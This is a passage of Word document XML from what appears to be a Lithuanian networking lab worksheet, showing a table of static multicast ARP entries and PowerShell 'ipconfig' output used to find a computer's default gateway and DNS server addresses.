                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="722EF67F" w14:textId="10498472"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224.0.0.22</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-00-00-16</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1410A1DB" w14:textId="6CBACA0D"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224.0.0.251</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-00-00-fb</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E7C8F3" w14:textId="1F330970"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224.0.0.252</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-00-00-fc</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C87977D" w14:textId="3CF02B81"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224.0.0.255</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-00-00-ff</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0261391D" w14:textId="76AD4A36"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224.2.127.254</w:t>
            </w:r>
            <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-02-7f-fe</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21ED7EBC" w14:textId="0FEC78D2"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239.192.152.143</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-40-98-8f</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0958A38A" w14:textId="6D1A0FB7"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239.195.255.255</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-43-ff-ff</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FD87BFD" w14:textId="1B9F4406" w:rsidR="00924E65"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239.255.255.250</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-7f-ff-fa</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757D6638" w14:textId="72DE4CFD" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>239.255.255.255</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>01-00-5e-7f-ff-ff</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B2F05DF" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Naudojamo kompiuterio Default Gateway IP adresą;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5EE158F0" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2600E992" w14:textId="77777777"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PS C:\Users\IT&gt; ipconfig</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0D4A4D" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Windows IP Configuration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB2DD27" w14:textId="77777777"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Ethernet adapter Eternetas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7468D00A" w14:textId="3BDEC6E9"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 xml:space="preserve"> Connection-specific DNS Suffix</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BDED0AC" w14:textId="23E938EA"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 xml:space="preserve"> IPv4 Address.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>..........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 192.168.1.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E78017E" w14:textId="2FB2330E"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 xml:space="preserve"> Subnet Mask</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>...........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F501925" w14:textId="41BD5674" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 192.168.1.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061DC762" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Naudojamo kompiuterio DNS IP adresus;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="712921EE" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F76A60F" w14:textId="77777777"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PS C:\Users\IT&gt; ipconfig /all</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45CD74C6" w14:textId="77777777"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Windows IP Configuration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7605BC46" w14:textId="77777777"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Ethernet adapter Eternetas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A94C80E" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B8F47F4" w14:textId="01E2A630"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 xml:space="preserve"> Connection-specific DNS Suffix</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C10984A" w14:textId="16650929"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 xml:space="preserve"> Description</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>...........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Realtek PCIe GbE Family Controller #3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAC6191" w14:textId="18379F3C"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 xml:space="preserve"> Physical Address.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 30-9C-23-DF-8D-95</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16477605" w14:textId="77D0F736"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 xml:space="preserve"> DHCP Enabled.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>..........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F62B0D" w14:textId="34F50D24"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 xml:space="preserve"> Autoconfiguration Enabled</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>....</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1944C258" w14:textId="018FE695"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 xml:space="preserve"> IPv4 Address.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>..........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 192.168.1.100 (Preferred)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2592B763" w14:textId="0868156D"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 xml:space="preserve"> Subnet Mask</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>...........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6778D56C" w14:textId="1A8A155A"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 xml:space="preserve"> Lease Obtained.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 2021 m. vasario 2 d., antradienis 10:01:20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C66AE1" w14:textId="5BD9D234"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 xml:space="preserve"> Lease Expires</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>..........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 2021 m. vasario 12 d., penktadienis 11:16:36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E464CFA" w14:textId="0D408CE4"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 xml:space="preserve"> Default Gateway</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639AF811" w14:textId="0B8B9C1F"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 xml:space="preserve"> DHCP Server</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>...........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 192.168.1.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E0DF55" w14:textId="4DE22C75" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>DNS Servers</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>...........</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : 1.1.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29C12159" w14:textId="6153F960"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 xml:space="preserve"> NetBIOS over Tcpip.</w:t>
            </w:r>
            <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.......</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5207960E" w14:textId="77777777" w:rsidR="007467FF" w:rsidRPr="005A5C28" w:rsidRDefault="007467FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
